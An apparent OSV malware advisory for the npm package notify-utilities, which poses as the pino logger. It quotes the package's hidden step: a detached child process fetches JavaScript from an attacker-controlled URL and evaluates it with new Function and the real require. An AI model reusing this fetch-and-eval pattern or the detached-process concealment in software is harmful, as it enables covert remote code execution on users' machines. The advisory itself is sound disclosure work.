notify-utilities @1.3.5
Vulnerability report · Last retrieved from osv.dev July 10, 2026 at 6:33 PM UTC
OSV ID
MAL-2026-10158
Ecosystem
npm
Summary
Package published as notify-utilities masquerades as the pino logger (package.json description, keywords, and index.d.ts are copied from pino; the exported factory is named pino ). When a consumer requires the package and invokes the exported factory, index.js spawns lib/vcall.js as a detached, unref'd Node child process. That child performs axios.get('https://api.jsonsilo.com/public/df71fd55-4f0c-4326-9b5b-a285e38023a5') , extracts response.data.model as a JavaScript source string, constructs a function from it via new Function.constructor('require', src) , and invokes the resulting handler with the live require , giving the fetched code full module-loading access inside the installer's Node process. The remote source is a third-party JSON storage service under attacker control; the fetched content is mutable and not tied to any publisher signature or version pin. The detached+unref child pattern is used to keep the fetch-and-eval alive after the factory's synchronous return, hiding the ongoing remote execution from the calling process.
Source: amazon-inspector (25536516e16cffdc7ad2891886d7dcf32ad325b9ba79c2359026809bcfbf417f)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.